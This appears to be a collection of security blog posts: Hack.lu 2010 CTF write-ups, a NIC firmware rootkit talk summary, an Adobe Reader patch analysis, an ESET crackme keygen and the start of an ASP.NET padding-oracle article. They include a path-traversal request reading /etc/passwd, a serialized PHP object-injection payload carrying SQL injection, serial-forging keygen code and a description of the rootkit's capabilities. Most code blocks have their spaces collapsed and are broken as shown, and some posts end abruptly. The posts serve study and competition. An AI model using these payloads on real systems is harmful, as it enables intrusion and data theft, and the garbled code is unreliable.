We attended Hack.lu this year in Luxembourg. This security conference is really nice and provides a Capture The Flag (CTF) contest organized by FluxFingers, the CTF Team of Ruhr-Universität Bochum (Germany).Here is the write-up of the challenge 16.

We were given a file named secret.pyc containing python bytecode for cPython.

We first tried to import this module inside an ipython session, but with no luckbecause we encountered a SystemExit exception.

So we decided to inspect this bytecode. We quickly found a wrapper around the python "dis"module (see http://nedbatchelder.com/blog/20080...) that will do the trick.

Since we didn't have a python decompiler at hand, and because the code is short, wedecided to do it by hand. We use the following script to debug the "secret" module:

#!/usr/bin/env pythonimportsyssys.argv=["secret.pyc","1000","1337","1000","1000","1001"]importpdbpdb.set_trace()# don't forget to adjust __file__ in line 72importsecret

This gave a quite large output, so the analysis of the bytecode is here.Finally we are left with around 100 code lines to analyze.

#!/usr/bin/env pythonfoobar=__import__("sys")importhashlibiflen(foobar.argv)<4:foobar.exit(0)secret1=foobar.argv[1]secret2=foobar.argv[2]secret3=foobar.argv[3]secret4=foobar.argv[2]secret5=foobar.argv[3]secret1=secret1secret4=secret4secret3=secret1secret1=secret1secret3=secret5secret1=foobar.argv[1]secret4=secret2secret3=secret1secret3=secret5secret5=secret3secret2=secret2iffloat(secret2)!=1337.0foobar.exit(0)token=0f1=open(foobar.argv[0],"r")f2=open(foobar.argv[0],"r")f=f1.read()f1.close()g=f2.read()f2.close()iff!=g:token+=0foobar.exit(0)token+=11111111111secret5=abs(hash(g))m=map(lambdax:hash(x)%31337,foobar.modules.keys())# all this for detecting decompiler modules I think ...if8732inm:foobar.exit(0)token+=54362345foobar.exit(0)if8474inm:token+=12312344if8474inm:token+=312395foobar.exit(0)if27445inm:foobar.exit(0)token+=53123i=foobar._getframe().f_lasti# i = 574token+=iif__file__!="secret.pyc":foobar.exit(0)token+=1000key=hashlib.sha1('adsf'+str(token+int(secret3))).digest()p='\x83\xc8\x8f\xb6!\xec\xb2\xbc\x8d\xf4\xb5q\x08\x9d\xaa\x99R\xf3J\x02\xdb\xd9\x95\xa0!\xcf\xa6\xf2\x94\xdd\xe0=p\x85\xf0\xb49\xd0Yz\xca\xf7\xd8\xee^\xc7\xe1\x97\xd2\x84\xb7c\x08\x8c\xcb\xb4B\xde\x1f\n\x8c\xae\x8f\xb1!\xde\xc6\xdf\xbd\xc1\xe0\\r\xda\x92\xf2`\x87:;\xed\x83\xf5\xf7\x13\xb5\xf4\xab\xd2\xd8\x8c\x1cP\xb1\xe0\xa3Q\x87g\x00\x92\xae\x9e\xd4\x0c\xdb\xda\xaa\xb1\xc2\xe0\\r\xdc\xa8\x99R\xf3J\x17\xed\xff\xa4\xc7q\x98\x9f\x88\xc4\xbf\xcd7Q\xca\xd0\xd9v\x87g\x00\x9a\x96\xf5\xe6x\x98\xc8\xbc\xab\xd0\xe0\\r\xdc\xab\x99R\xf3J7\xed\xf8\xa3\xa0!\xcf\xa4\xcc\xff\xef\x94q]\xbd\xc4\xcfg\x87g\x00\x9a\x91\xf5\xe6x\x98\xcf\xa5\xb2\xd2\x9bq\x08\x9d\xa9\xa59\xc1>W\xfd\xfe\xa4\xd1l\xef\xd4\xa8\xa9\xf6\xf64%\xe7\xe8\xa2\x04\xaa\x0c^'os=""fori,cinenumerate(p):os+=chr(ord(c)^ord(key[(i%len(key))]))importcPickletry:o=cPickle.loads(os)except:foobar.exit(0)d=[]fori,winenumerate(o):r=''forcinw:r+=chr(ord(c)^(int(secret1)+2*i))d.append(r)s=" ".join(d)printrepr(s)

Once we eliminated all the anti-analysis code, we obtained the following infos :

• we need to find the value of 2 integers: secret1 and secret3
• secret3 is use to create the pickled data of a list
• secret1 is use as argument for the chr function hence its value must be contained between 0 and 255
• the value of token is 11111112685

We quickly wrote a function to do the bruteforce for us:

#!/usr/bin/env pythonimportsysimporthashlibimportcPickleimportstringtoken=11111112685p='\x83\xc8\x8f\xb6!\xec\xb2\xbc\x8d\xf4\xb5q\x08\x9d\xaa\x99R\xf3J\x02\xdb\xd9\x95\xa0!\xcf\xa6\xf2\x94\xdd\xe0=p\x85\xf0\xb49\xd0Yz\xca\xf7\xd8\xee^\xc7\xe1\x97\xd2\x84\xb7c\x08\x8c\xcb\xb4B\xde\x1f\n\x8c\xae\x8f\xb1!\xde\xc6\xdf\xbd\xc1\xe0\\r\xda\x92\xf2`\x87:;\xed\x83\xf5\xf7\x13\xb5\xf4\xab\xd2\xd8\x8c\x1cP\xb1\xe0\xa3Q\x87g\x00\x92\xae\x9e\xd4\x0c\xdb\xda\xaa\xb1\xc2\xe0\\r\xdc\xa8\x99R\xf3J\x17\xed\xff\xa4\xc7q\x98\x9f\x88\xc4\xbf\xcd7Q\xca\xd0\xd9v\x87g\x00\x9a\x96\xf5\xe6x\x98\xc8\xbc\xab\xd0\xe0\\r\xdc\xab\x99R\xf3J7\xed\xf8\xa3\xa0!\xcf\xa4\xcc\xff\xef\x94q]\xbd\xc4\xcfg\x87g\x00\x9a\x91\xf5\xe6x\x98\xcf\xa5\xb2\xd2\x9bq\x08\x9d\xa9\xa59\xc1>W\xfd\xfe\xa4\xd1l\xef\xd4\xa8\xa9\xf6\xf64%\xe7\xe8\xa2\x04\xaa\x0c^'defbf1(secret3):key=hashlib.sha1('adsf'+str(token+int(secret3))).digest()os=''fori,cinenumerate(p):os+=chr(ord(c)^ord(key[(i%len(key))]))try:o=cPickle.loads(os)exceptException:returnNoneifisinstance(o,list)andlen(o)>0:returnodefbf2(secret1,o):d=[]try:fori,winenumerate(o):r=''forcinw:r+=chr(ord(c)^(int(secret1)+(2*i)))d.append(r)exceptException,e:returnNones=" ".join(d)ifs!='':returnsiflen(sys.argv)!=3:print"usage: %s start end"%(sys.argv[0])sys.exit(0)o=Nonestart=int(sys.argv[1])end=int(sys.argv[2])forsecret3inxrange(start,end):ifsecret3%1000==0:sys.stdout.write(".")sys.stdout.flush()o=bf1(secret3)ifoisnotNone:breakforsecret1inxrange(256):s=bf2(secret1,o)ifsisnotNone:c=[cforcinsifcinstring.printable]iflen(c)==len(s):print"\nsecret1 is %d, secret3 is %d and key is %s"%(secret1,secret3,repr(s))

After about 5 minutes we find the magic values for secret1 and secret3:

• secret3 = 554433
• secret1 = 23

which gives us the key :

'Some kids piss their name in the snow. Chuck Norris can piss his nameinto concrete.'

This challenge gives us 400 gold, yeah ! And kudos for the orgas for such a fun challenge :)

Guillaume was giving a talk at the Hack.lu 2010 conference in Luxembourg, where we enjoyed to participate to the Capture The Flag. After intense competition against about 70 teams, we finally ended at the 1st place. Congratulations to FluxFingers who organized the CTF and did an impressive work, both for providing original challenges and letting it open to local and remote teams!

The goal of the web challenge 21 was to guess how much gold Jack, the leader of the PIGS' organisation, had stolen so far. A quick look at the website shows that there aren't much entry points from an attacker point a view:

• A support interface to upload language files. If we try to upload any file, a message warns us that the upload is aborted because our language file has not been signed.
• A contact form.
• A hidden administration area (link in the HTML source), which requires a valid username and password.

The particularity of the website is that 10 international languages are supported, as shown by the little flags at the top of the menu and the support page:

We ship gold all over the world and are doing our best to make our internationalbusiness as comfortable as possible for our customers. Our website supports 10international languages (automatically detected) and we are always looking forhelp to support new languages. If you are interested, please contact us for moreinformation and to receive the key for signing your language file. We would liketo thank all contributors!

There aren't many standard ways to guess a browser language, and playing with the Accept-Language HTTP header promptly reveals a flaw that allows us to read any file on the system (respecting www-data read permissions). The following HTTP request returns the content of /etc/passwd:

GET /PIGS/ HTTP/1.0
Host: pirates.fluxfingers.net
Accept-Language: ../../../../etc/passwd

Thus, we can gather the whole PHP sources of the PIG web application, and start some code source auditing:

• sources/config.php
• sources/index.php
• sources/worker/funcs.php
• sources/worker/mysql.php
• sources/html/index.php
• sources/html/admin.php
• sources/html/upload.php
• sources/html/header.php
• sources/html/services.php
• sources/html/contact.php
• sources/html/footer.php

A quick grep over the sources for dangerous functions doesn't give any results, so we started to look at the code responsible of the signed file upload.

define("MESSAGES",   "messages/");define("SECRET_KEY", "p1r4t3s.k1lly0u");function signed($file) {  $data = file_get_contents($file);  if (!($messages = unserialize($data)))    return false;  else if ($messages['secretkey'] !== SECRET_KEY)    return false;  return true;}if (!empty($_FILES) && !empty($_FILES["userfile"]["name"])) {  if (!@is_file(MESSAGES . $_FILES["userfile"]["name"]))  {    if (signed($_FILES["userfile"]["tmp_name"]))  {      if (move_uploaded_file($_FILES["userfile"]["tmp_name"], MESSAGES . $_FILES["userfile"]["name"]))        print $messages["upload_success"];      else        print $messages["upload_fail"];    }    else {      print $messages["upload_notsigned"];    }  }  else {    print $messages["upload_exists"];  }}

$message = array('secretkey' => 'p1r4t3s.k1lly0u','footer'    => 'pwn');echo serialize($message);

class sql_db {  var $db_connect_id;  var $log_table;  var $query_result;  var $row = array();  var $rowset = array();  var $num_queries = 0;  function __wakeup()  {    if ($this->persistency)      $this->db_connect_id = mysql_pconnect($this->server, $this->user, $this->password);    else      $this->db_connect_id = mysql_connect($this->server, $this->user, $this->password);    if ($this->db_connect_id) {      if ($this->dbname != "") {        $dbselect = mysql_select_db($this->dbname);        if(!$dbselect) {          mysql_close($this->db_connect_id);          $this->db_connect_id = $dbselect;        }      }      return $this->db_connect_id;    }    else {      return false;    }  }  function sql_close() {    if ($this->db_connect_id) {      $this->createLog();      if ($this->query_result)        mysql_free_result($this->query_result);      mysql_close($this->db_connect_id);      return true;    }    else {      return false;    }  }  function createLog() {    $ip        = $this->escape($_SERVER['REMOTE_ADDR']);    $lang      = $this->escape($_SERVER['HTTP_ACCEPT_LANGUAGE']);    $agent     = $this->escape($_SERVER['HTTP_USER_AGENT']);    $log_table = $this->escape($this->log_table);    $query     = "INSERT INTO " . $log_table . " VALUES ('', '$ip', '$lang', '$agent')";    $this->sql_query($query);  }  function escape($string) {    if (!get_magic_quotes_gpc())      return mysql_real_escape_string($string, $this->db_connect_id);    else      return $string;  }  function __destruct() {    $this->sql_close();  }

function login() {  global $db;  $name = $db->escape($_POST['name']);  $pass = $db->escape($_POST['pass']);  $result = $db->sql_query("SELECT name FROM users WHERE name='$name' and password='$pass'");  if($db->sql_numrows($result) > 0)    return true;  return false;}function printGold(){  global $db;  $name = $db->escape($_POST['name']);  $result = $db->sql_query("SELECT gold FROM users WHERE name='$name'");  if ($db->sql_numrows($result) > 0) {    $row = $db->sql_fetchrow($result);    echo htmlentities($name).'\'s gold: '.htmlentities($row['gold']);  }}

INSERTINTOusers(name,gold,password)SELECT0x61,gold,0x61FROMusers;-- VALUES ('', '$ip', '$lang', '$agent')

class sql_db {  var $persistency   = true;  var $db_connect_id = false;  var $user      = 'pigs';  var $password  = 'pigs';  var $server    = 'localhost';  var $dbname    = 'pigs';  var $log_table = 'users(name,gold,password) SELECT 0x61,gold,0x61 FROM users;--';}$message = array('secretkey' => 'p1r4t3s.k1lly0u','pwn'       => new sql_db());echo serialize($message);

I was giving a talk in October during last hack.lu session. The presentation focuses on the roadmap taken to reverse engineer the Broadcom Ethernet NetExtreme firmware family: building a firmware debugger, instrumentation tools, to finally develop a customized network card firmware.

NetExtreme family cards are the standard range of PCI Ethernet cards from Broadcom. Broadcom released part of their soft specifications (inner workings, memory mappings, device register definitions...). However those specifications are incomplete and the firmware is distributed as a binary blob.

Given publicly available documentation (specifications, Linux open-source driver) and free open-source tools, I have built a set of tools to instrument the network card firmware. Those tools provided me a way to debug in real-time the MIPS CPU of the network card, as well as doing some advanced instrumentation on the firmware code (execution flow tracing, memory-accesses logging...). I have also reverse engineered the format of the EEPROM where firmware code is kept and the bootstrap process of the device leading to firmware execution. This way it is possible to develop a custom firmware code, flash the device and get execution on the CPU of the network card.

The main interest is developing a rootkit which will be residing inside the network card. A network card rootkit offers some very interesting features:

• A very stealthy communication end-point over the Ethernet link. It can intercept and forge network frames without the operating system knowing about it.
• A physical system memory access using DMA over the PCI link, leading to OS corruption.
• No trace of the rootkit on the operating system, as it is being hidden inside the NIC.

The network card natively needs to perform DMA accesses, so that network frames can be exchanged between the driver and the device. From the firmware point of view, everything is operated using special dedicated device registers, some of them being non-documented. An attacker would then be able to communicate remotely with the rootkit in the network card and get access to the underlying operating system thanks to DMA.

Slides of my presentation are available here.

Here is a little demo of what can be done once you develop your own network card firmware:

This post details the way Adobe patched the printSeps() vulnerability in Adobe Reader (CVE-2010-4091). You'll see that the way Adode fixed the vulnerability is quite surprising...

Very lately a vulnerability in the undocumented JavaScript method printSeps() of Adobe Reader was disclosed (CVE-2010-4091). A few days later Adobe released a patch to fix it. Motivated by curiosity I decided to investigate the matter and find out how the vulnerability had been patched. I was really surprised by the way it was done and so I decided to share my findings, and therefore I wrote this post.

First of all, one has to understand how Adobe Reader’s JavaScript engine works. Interesting presentations have already been performed on this subject especially this one:http://www.immunitysec.com/download..., that I suggest interested people should read.

Adobe Reader's JavaScripts's engine is implemented in various files in the application's “Reader\\plug_ins” directory. Those plug-ins have an “*.api” extension, but are nothing more than regular dlls. During the application's initialization, the JavaScript classes register each property and method with a corresponding native handler as we can see below:

pushoffsetprintSepsWithParamsHandler; offset of native handlerpushoffsetaPrintsepswithp; "printSepsWithParams" : offset of method namepushesi; intcallRegisterMethod; function responsible for method registrationpushoffsetscrollHandler; intpushoffsetaScroll; "scroll"pushesi; intcallRegisterMethodpushoffsetmailDocHandler; intpushoffsetaMaildoc; "mailDoc"pushesi; intcallRegisterMethod

Each plug-in file has a dispatcher responsible for calling the JavaScript native handlers with the given arguments, once it has checked that the method exists.The EScript.api, where the printSeps() native handler is implemented, has the following JavaScript dispatcher :

mov[ebp+var_30],edijnzshortloc_2382EB7Cpush[ebp+FunctionName]; gives the method name as argumentleaebx,[ebp+var_30]moveax,edicallRetrieveHandlerByName; function returns the native handler address if it is foundpopecx...movesi,[ebp+var_30]pushedipush[ebp+FunctionName]; gives the method name as argumentpush2callIsMethodCallable; function returns a boolean to indicate if the user has suffiscient rights to call the methodaddesp,10htestal,al...pushesipush[ebp+var_24]push[ebp+FunctionName]push[ebp+var_28]call[ebp+HandlerFunc]; calls the native handler whose address has just been resolved

The Dispatcher firsts finds the native handler for the JavaScript method, then checks if the method is callable given the user’s security context, and finally calls the native handler.

I wanted to debug the printSeps() native handler from the patched version, but I realized that the JavaScript dispatcher was never called on the printSeps() method. Something was obviously wrong with the JavaScript itself, and something really funny. In fact Adobe had simply decided to remove this JavaScript method from the object rather than to patch its native handler vulnerability. It is removed by a simple test in the Doc object initialization:

callsub_23825DDDtestax,axjnzshortloc_23802D71pushoffsetsub_2383904D; intpushoffsetaPrintseps; "printSeps"pushesi; intcallRegisterMethodloc_23802D71:

The printSeps method is added to the Doc object or not depending on the result of the function at offset 0x23825DDD. This function is equivalent to the following C code:

if(strcmpw(ProductName,L”Reader”)==0)return1;elsereturn0;

In other words, if the product is Adobe Reader then the printSeps() method is simply removed from the JavaScripts engine. The funny thing is that the native handler of printSeps() is still present and vulnerable.I think that Adobe's current solution may be temporary; since it looks more like a “quick and dirty” fix. And I would not be surprised if the printSeps() vulnerability was to reappear in the near future ;).

Here is the missing Hack.lu CTF write-up for the "seamonster" challenge. It was a Windows reverse engineering challenge, with a nice anti-debugging trick.

The challenge objective is to give "Ring3" the correct password to keep our ship afloat and get the gold ! Let's have a look at the main function :

charBuf[32];//holds the users inputintwmain(intargc,wchar_t*argv[]){DWORDpid_1,dwProcessId;PROCESS_INFORMATIONProcessInformation;STARTUPINFOWStartupInfo;WCHARcommandLineParams[16];if(argc==1)//first launch{print_ascii_message();pid_1=GetCurrentProcessId();wsprintfW(commandLineParams,L"%d %d",1,pid_1);std::basic_string<WCHAR>s;s+=argv[0];s+=L" ";s+=commandLineParams;memset(&StartupInfo,0,sizeof(StartupInfo));//seamonster.exe 1 <PID_1>CreateProcessW(argv[0],(LPWSTR)s.c_str(),0,0,0,DEBUG_ONLY_THIS_PROCESS,0,0,&StartupInfo,&ProcessInformation);LFSR1_runloop();//sub_401F80()  (noreturn)}if(argc==3)//second and third processes{if(argv[1][0]=='1'){wsprintfW(commandLineParams,L"%d %s",2,argv[2]);std::basic_string<WCHAR>s;s+=argv[0];s+=L" ";s+=commandLineParams;memset(&StartupInfo,0,sizeof(StartupInfo));//seamonster.exe 2 <PID_1>CreateProcessW(argv[0],(LPWSTR)s.c_str(),0,0,0,DEBUG_ONLY_THIS_PROCESS,0,0,&StartupInfo,&ProcessInformation);LFSR2_runloop();//sub_401FC0() (noreturn)}printf(">>> ");gets_s(Buf,32);//get user inputswscanf(argv[2],L"%d",&dwProcessId);//get <PID_1> from command lineif(DebugActiveProcess(dwProcessId)==1)//attach 3rd process to 1stprocess3_main();}return0;}

The anti-debug technique used is interesting : 3 processes are spawned and debug each other in a circular fashion (1->2->3->1), hence preventing another ring3 debugger to attach. Furthermore, each process manages a 128 bit linear feedback shift register (LFSR), and the feedback bits are exchanged through debug interrupts : the debugger process injects the bit value in the eax register of the debuggee using SetThreadContext. Therefore, removing the debugging code makes the binary non functional. The keystream generated by the LFSRs is used by the third process to decrypt two functions, which we will call stage1 and stage2. The following C code shows the `` process3_main`` function :

voidprocess3_main()//0x402080{//init LFSR function pointersptr_f1=&LFSR3_f1_output;ptr_f2=&LFSR3_f2_feedback;ptr_f3=&LFSR3_f3_update;ptr_setState=&LFSR3_setState;ptr_xor_string=&LFSR3_xor_string;LFSR3_newState="FluxFingers";//wait debug attach to process 1WaitForOneDebugEvent();//tell parent processes to reset LFSR state__asm{pusheaxmoveax,0int3popeax}//wait for the interrupt to loop back to uswhile(WaitForDebugAndSetEAX()!=1);//init LFSR3 state with LFSR3_newState(*ptr_setState)();//drop first 50 keystream bytesfor(i=0;i<50;i++){LFSR3_getByte();}//decrypt first encrypted functionfor(i=0;i<384;i++)//loc_4020F0{*(&stage1+i)^=LFSR3_getByte();}stage1();}

Instead of reversing the LFSR algorithm, we went the easy way and patched the binary to dump the keystream by adding some calls to printf. This solution is probably not the most elegant but allowed us to quickly solve this challenge. For instance in the previous function, we simply patched the second loop to display each byte of the key by jumping to an existing call to printf and setting the format string to "%02x". The following "bindiff" shows the idea :

loc_4020F0:callsub_402000; LFSR3_getByte ()movecx,offsetloc_402430; stage1-xor[ecx+esi],al-addecx,esi+andeax,0FFh+callsub_4021D0incesicmpesi,384jlshortloc_4020F0callloc_402430; stage1()...sub_4021D0:-push0+pusheax+nop-pushoffsetaRing3T_t_h_s_0; "Ring3 T.T.H.S.M.> Mrrrmmmmmpffff!\nRing3"...+pushoffseta02x; "%02x"callds:printfaddesp,8retn

Once we run the patched binary, the keystream is displayed and we can then decrypt the stage1 function and disassemble it to get the following code :

voidstage1(){structMD5_CTXmd5_context;charstage2key[214];char*heapBuffer;void(*stage2ptr)();MD5_Init(&md5_context);//inlined//hash the whole .text section except for the encrypted stage 2 at 0x4025B0MD5_Update(0x15B0,&md5_context,0x401000);//first parameter is data sizeMD5_Update(0x97A,&md5_context,0x402686);MD5_Final(&md5_context);//trigger LFSR state reset in parent processes__asm{pusheaxmoveax,0int3popeax}//wait for the interrupt to loop back to uswhile(WaitForDebugAndSetEAX()!=1);//use integrity check output to reinitialize LFSRLFSR3_newState=&md5_context->digest;(*ptr_setState)();//drop first 60 bytes of keystreamfor(i=0;i<60;i++){LFSR3_getByte();}HANDLEheap=HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0);srand((int)heap);intrandomIndex=rand()%1000;for(i=0;i<214;i++){//we'll put our second "printf patch" here to get the keystage2key[i]=LFSR3_getByte();}for(i=0;i<1000;i++){heapBuffer=HeapAlloc(heap,0,214);if(i==randomIndex){//copy encrypted stage 2 to heap memorymemcpy(heapBuffer,0x4025B0,214);stage2ptr=heapBuffer;}for(i=0;i<107;i+=2){heapBuffer[i]^=stage2key[i];heapBuffer[i+1]^=stage2key[i+1];}}//call decrypted stage2 on heap*(stage2ptr)(stage2ptr);}

This function allocates 1000 buffers and run the decryption code on each, but only one of them (randomly chosen) will be initialized with the encrypted stage2. If we do the same as before and patch the loop which gets the keystream, the decrypted code ends up being incorrect. In fact, the MD5 digest is used to reinitialize the LFSR, so I had to patch the MD5_final function to always return the right value (140e351638717e04e73ff8ec5e2a81db). Once this is done we can decrypt and reverse the last stage :

voidstage2(void*stage2heapBuffer){DWORDstage2_opcodes[3];chargood_passphrase[32];stage2_opcodes[0]=((DWORD*)stage2heapBuffer)[0];stage2_opcodes[1]=((DWORD*)stage2heapBuffer)[1];stage2_opcodes[2]=((DWORD*)stage2heapBuffer)[2];//reset LFSR state with first stage2 bytesLFSR3_newState=&stage2_opcodes[0];(*ptr_setState)();memcpy(good_passphrase,encrypted_passphrase,32);//xor encrypted passphrase with keystream(*ptr_xor_string)(good_passphrase,31);//insert printf here :)intpassOk=!strcmp(Buf,good_passphrase);memset(good_passphrase,0,32);//erase current function and jump to display_win/fail (ROP)//memset(stage2heapBuffer, 0, 214);__asm{push0push214push0pushstage2heapBuffer}if(passOk)__asm{pushoffsetdisplay_win}else__asm{pushoffsetdisplay_fail}__asm{pushoffsetmemsetretn}}

The LFSR state is reset again, this time using the first bytes of the stage2 function, and then the correct passphrase is decrypted (it is stored in the .data section) and compared with the user's input. One last "printf patch" at the right spot and we finally get the right answer : "Ring3?! Lol! Joanna did Ring-1!".

After the CTF was over I took some time to fully reverse the LFSR algorithm, and the following Python script reproduces the seamonster functionality to decrypt the two stages and the passphrase.

importhashlib,structdefxor_string(data_string,key_int):res=""foriinxrange(len(data_string)):res+=chr(ord(data_string[i])^key_int[i%len(key_int)])returnresdefgetbit(x,pos):return(x>>pos)&1definsertHighBit(x,b):return(x>>1)|(b<<127)classLFSR_process1:#0x401A20def__init__(self):self.state=0xBBCCDDEEFF0011223344000000000000#0x401BC0deff1_output(self):return#not used#0x401AC0deff2_feedback(self):return(getbit(self.state,108)|getbit(self.state,44)) \
            ^(getbit(self.state,123)|getbit(self.state,59)) \
            ^(getbit(self.state,109)|getbit(self.state,45)) \
            &(getbit(self.state,110)|getbit(self.state,46))#0x401CA0deff3_update(self,feedback):newbit=feedback^(getbit(self.state,51)|getbit(self.state,114))self.state=insertHighBit(self.state,newbit)classLFSR_process2:#0x401A50def__init__(self):self.state=0x000000000000000000000000000e0000#0x401BF0deff1_output(self):return#not used#0x401B10deff2_feedback(self):return(getbit(self.state,81)|getbit(self.state,17)) \
            ^(getbit(self.state,126)|getbit(self.state,62)) \
            ^(getbit(self.state,82)|getbit(self.state,18)) \
            &(getbit(self.state,83)|getbit(self.state,19))#0x401D10deff3_update(self,feedback):newbit=feedback^(getbit(self.state,42)|getbit(self.state,105))self.state=insertHighBit(self.state,newbit)classLFSR_process3:def__init__(self,p1,p2):self.state=0self.p1=p1self.p2=p2#0x401960defsetState(self,str):str=str[:10]#only use 10 bytesself.state=0self.state|=struct.unpack(">L",str[:4])[0]<<96self.state|=struct.unpack(">L",str[4:8])[0]<<64self.state|=struct.unpack(">H",str[8:10])[0]<<48#0x401B90deff1_output(self):return(getbit(self.state,99)|getbit(self.state,35)) \
             ^(getbit(self.state,126)|getbit(self.state,62))#0x401A70deff2_feedback(self):return(getbit(self.state,99)|getbit(self.state,35)) \
            ^(getbit(self.state,126)|getbit(self.state,62)) \
            ^(getbit(self.state,100)|getbit(self.state,36)) \
            &(getbit(self.state,101)|getbit(self.state,37))#0x401C30deff3_update(self,feedback):newbit=feedback^(getbit(self.state,60)|getbit(self.state,123))self.state=insertHighBit(self.state,newbit)#0x402000defgetByte(self):x=0foriinxrange(8):x|=self.f1_output()<<(7-i)feedback=self.p2.f2_feedback()self.p2.f3_update(self.p1.f2_feedback())self.p1.f3_update(self.f2_feedback())self.f3_update(feedback)returnxdefgetBytes(self,n):return[self.getByte()foriinxrange(n)]#sha1=7A46DC5D6C2A52824937B86A94528FFEF33CBDDCf=open("seamonster.exe","rb")binary=f.read()f.close()#0x402430encrypted_stage1=binary[0x1830:0x1830+384]#0x4025b0encrypted_stage2=binary[0x19b0:0x19b0+214]#0x403144encrypted_password=binary[0x2544:0x2544+31]lfsr3=LFSR_process3(LFSR_process1(),LFSR_process2())lfsr3.setState("FluxFingers")#Drop first 50 bytes of keystreamdrop=lfsr3.getBytes(50)stage1key=lfsr3.getBytes(384)stage1=xor_string(encrypted_stage1,stage1key)binary_with_stage1=binary.replace(encrypted_stage1,stage1)#stage1 operationsmd5sum=hashlib.md5()md5sum.update(binary_with_stage1[0x400:0x400+0x15b0])md5sum.update(binary_with_stage1[0x1A86:0x1A86+0x97A])print"MD5 integrity check :",md5sum.hexdigest()#reset all states (int3 eax=1)lfsr3=LFSR_process3(LFSR_process1(),LFSR_process2())#use md5 for process3 statelfsr3.setState(md5sum.digest())#Drop first 60 bytes of keystreamlfsr3.getBytes(60)stage2key=lfsr3.getBytes(214)stage2=xor_string(encrypted_stage2,stage2key)#stage2 operations#reset LFSR3 state with decrypted stage2 instructionslfsr3.setState(stage2[:10])passkey=lfsr3.getBytes(len(encrypted_password))#Ring3?! Lol! Joanna did Ring-1!print"Decrypted password :",xor_string(encrypted_password,passkey)

That's it for the seamonster, thanks again to FluxFingers for this great CTF.

ESET proposed a crackme during the CONFidence conference. Challenge started on November, 29th and lasted two days. The goal was to find a valid username/serial combination. Challenge was won by Dmitry Sklyarov, from ElcomSoft. This article will present a solution for the crackme, and the steps needed to write a key generator for it. Even if the crackme size is only 11.5kB, many tricks are used to make the verification routine tricky enough to resist a few hours.

for(i=15;i>=0;i--){out[i]='a'+(hash[i]%26);}

defx65599(string_to_hash):hash=0s2=string_to_hash.upper()foriinrange(len(s2)):c=ord(s2[i])hash=(hash*65599)&0xffffffffhash=(hash+c)&0xffffffffreturnhash

defbuild_crc_tables():foriinrange(256):fwd=irev=i<<24forjinrange(8,0,-1):# build normal tableif(fwd&1)==1:fwd=(fwd>>1)^0xedb88320else:fwd>>=1crc32_table[i]=fwd# build reverse table =)ifrev&0x80000000==0x80000000:rev=((rev^0xedb88320)<<1)|1else:rev<<=1crc32_reverse[i]=revdefcrc32forge3(wanted_crc):''' return a 8 chars string whose crc32 is equal to wanted_crc '''charset='2WQKHTL3VJBYG6PZCM9AXF0UED5RS7N8'start_value=0x45534554^0xffffffff# ESETwhile1:# generate random string of 4 charss=''.join(charset[random.randint(0,31)]foriinrange(4))crc=start_valueforiinrange(4):crc=(crc>>8)^crc32_table[(crc^ord(s[i]))&0xff]s+=pack('<L',crc)crc=wanted_crc^0xffffffffforiinrange(7,3,-1):crc=(crc<<8)^crc32_reverse[crc>>24]^ord(s[i])crc&=0xffffffffs2=s[:4]+pack('<L',crc)# check if added bytes are in the charset# else same player play againvalid=Trueforiinrange(4):ifcharset.find(chr((crc>>(8*i))&0xff))==-1:valid=Falsecontinueifvalid==True:returns2crc32forge3(x65599_hash)# for example

.movzxeax,byteptr[esi]; esi points to the input stringincesitesteax,eaxjzshortend_functionxorebx,ebxxoredx,edxsubeax,32h; eax -= 0x32jbshortend_functiontesteax,0E0hjnzshortend_functionmovedx,1Fh; 5 bits set to 1movecx,4loop1_start:; CODE XREF: sub_4012DC+3Dcmpeax,edxjzshortloop1_endbtcedx,ecx; test and complementincebxdececxjnsshortloop1_startloop1_end:; CODE XREF: sub_4012DC+36jzshortloop2_endmovecx,4loop2_start:; CODE XREF: sub_4012DC+4Fcmpeax,edxjzshortloop2_endbtcedx,ecx; test and complementincebxdececxjnsshortloop2_startloop2_end:; CODE XREF: sub_4012DC:loop1_end; sub_4012DC+48jnzshortend_function

defdecimal_encode(n):charset='QA9532BJNP'# btc stuffs=''foriinrange(20):s=charset[n%10]+sn/=10returns

sub_4012C2procnear; CODE XREF: sub_4014C3+C6; sub_4014C3+DBarg_0=dwordptr4pushesimovesi,[esp+4+arg_0]moveax,[esi]movedx,[esi+4]xoreax,[esi+8]xoredx,[esi+0Ch]andedx,7FFFFFFFhpopesiretn4sub_4012C2endp

.text:00401237movdwordptr[edx],3; generator.text:0040123Dmovdwordptr[edx+4],0.text:00401244pushesi; h.text:00401245pushedx.text:00401246pusheax; result.text:00401247callpowmod64; compute g^h mod p

.text:0040113Epush0FFFFFFFFh.text:00401140push0FFFEA007h.text:00401145pushedx.text:00401146pusheax.text:00401147callRtlLargeIntegerSubtract

p-1=2*3*3*5*7*11*13*3797*42701*1262887

p=0xfffffffffffea007Lg=3y=0x5353453233444f4eLx=0x62dd00828bb0e577Lh=...k=...# random_value such as gcd(k, p-1) == 1r=pow(g,k,p)s=((h-x*r)%(p-1))s=s*number.inverse(k,p-1)%(p-1)

ASP.NET is a group of Web development technologies created by Microsoft, which offers developers an easy way to create dynamic web sites, web applications, or XML web services. To use it, a compatible web server is needed (like Microsoft IIS for example). ASP.NET is part of Microsoft.NET platform and represents an evolution of ASP. ASP.NET uses cryptography in order to encrypt sensitive data. This way, it is hidden and protected against attacks and unwanted modifications. In mid-September, a vulnerability on ASP.NET was reported. It corresponds to CVE-2010-3332. It reveals that ASP.NET is vulnerable to a "padding oracle" attack. In this article, we will describe this type of attack, show why it is possible on ASP.NET, and how to resolve it.

C:\> python pyPaddOracle.py -cText to encrypt: admin=1Padded text: 61646d696e3d3101Ciphered value (IV + Ciphered text): 1712180527255516b97097596694c420

classMyPaddingOracleServer:key='iloveyouihateyou'iv='1712180527255516'.decode('hex')defpkcs7(self,text,length):if((len(text)%8)==0):amount=8else:amount=length-len(text)%lengthpattern=chr(amount)pad=pattern*amountreturntext+paddefencrypt(self,plain):cipher=DES3.new(self.key,DES3.MODE_CBC,self.iv)paddedPlainText=self.pkcs7(plain,DES3.block_size)cipheredText=cipher.encrypt(paddedPlainText)print"Padded text: "+paddedPlainText.encode('hex')print"Ciphered value (IV + Ciphered text): "+self.iv.encode('hex')+cipheredText.encode('hex')

